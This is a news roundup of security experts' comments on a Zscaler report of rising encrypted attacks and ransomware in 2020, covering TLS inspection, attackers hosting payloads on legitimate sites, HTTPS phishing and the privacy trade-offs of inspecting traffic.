New research by Zscaler, analyzing 6.6 billion security threats, has discovered a 260% increase in attacks during the first nine months of 2020. Among the encrypted attacks was an increase of the amount of ransomware by 500%, with the most prominent variants being FileCrypt/FileCoder, followed by Sodinokibi, Maze and Ryuk.
Here’s what security experts had to say about these findings:
Oleg Kolesnikov, VP of Threat Research at Securonix
“Having more visibility into the SSL/TLS traffic definitely is one of the key elements needed to detect modern attacks. However, SSL/TLS inspection/termination alone is often not sufficient. To illustrate, even with SSL/TLS inspection in place, malicious threat actors (MTA) often implement additional layers of encryption and obfuscation on top of SSL/TLS and are also often leveraging legitimate sites, such as githubusercontent, cloud drives, and others, to “reflect”/host malicious stager payloads.
One example is Trickbot/Powertrick MTA where we’ve been seeing attackers download post-attack powershell stagers from SSL/TLS sites. For this reason, in addition to SSL/TLS inspection and termination, it’s important to be able to monitor SSL/TLS activity in context of some of the other activity that happens in your environment from a variety of log/data sources and be able to correlate behaviours across different log/data sources effectively, especially when it comes to cloud collaboration apps.”
Richard Bejlitch, principal security strategist at Corelight
“Better visibility is helpful, but it must be balanced against legal, technical, and ethical considerations. Because there are organizations that cannot or choose not to break and inspect encrypted traffic, it is important that organizations continue to heavily invest in research and deploy innovative analytical approaches to provide visibility while preserving encryption.”
Niamh Muldoon, senior director of trust and security at OneLogin
“I agree that using security controls such as SSL cert to secure communications and links could support masking the threat and attack vector and this is why in-depth control frameworks are so important; Other security controls and alerts would highlight this as malicious activity for investigation. An identity and access management platform that accesses risk control from both an authentication and authorization perspective would support identifying these malicious attack attempts as risk factors would change and reduce the associated risks.
For any cybersecurity team to be successful they must have security monitoring, alerting technologies and tooling throughout their organisation’s architecture so they can identify a threat and respond accordingly to reduce business impacts and consequences, up to and including preventing a data breach. In a cybersecurity protection role this too can include the ability to monitor encrypted communication channels.
There are no privacy implications here; The definition of privacy is the permitted access to data to carry out the business requirements, and in this case access is granted to review communication channels and identify the cybersecurity threat contained within the encrypted channel. That being said, if the security team have been involved in the design and architecture of the network/communication channels using encryption, they will be implemented in a way that they can identify authentication communications to unauthorized users, along with the ability to monitor a specific communication should they need to.”
Jamie Akhtar, co-founder and CEO at CyberSmart:
“For most organisations, particularly SMEs with little to no resources or knowledge dedicated to cybersecurity, determining the safety of a site comes down to whether or not it has padlock symbol in the search bar. Unfortunately, while tools such as this are primarily employed to ensure privacy and data integrity, it can also be manipulated for nefarious uses. Indeed, it’s a clever trick as malicious acts are masked behind a symbol universally recognised to mean ‘secure’ and ’safe’. Organisations would benefit from deploying security defences that analyse the legitimacy of connections.”
Stephen Banda, senior manager of security solutions at Lookout:
“The use of SSL certificate phishing attacks is an effective method to trick the end user into clicking the link since most users view the https prefix and padlock symbol as a sign of security.
First developed in 1994, the SSL certificate has long been regarded as the gold standard for digitally certifying the identity of a website and encrypting website traffic. This encryption, when used for legitimate websites, helps protect against man-in-the-middle attacks, spoofed websites, and eavesdroppers so that your information remains secure.Unfortunately, without a central authority governing the creation of https sites, hackers have been registering and spinning up https-enabled phishing sites at a rapid pace.
Lookout identifies mobile phishing attacks without inspecting message content so that user privacy is respected. Lookout processes a minimum of 15 million TLS certificate events and 150,000 new domain registrations daily, resulting in 15,000 phishing domains each month.
Sophisticated cybersecurity solutions should be able to detect SSL certs in phishing attacks without inspecting message content. This is especially important as employees increasingly use their personal tablets, smartphones, and chromebooks for work. They do not want their employer inspecting their web content and demand privacy.”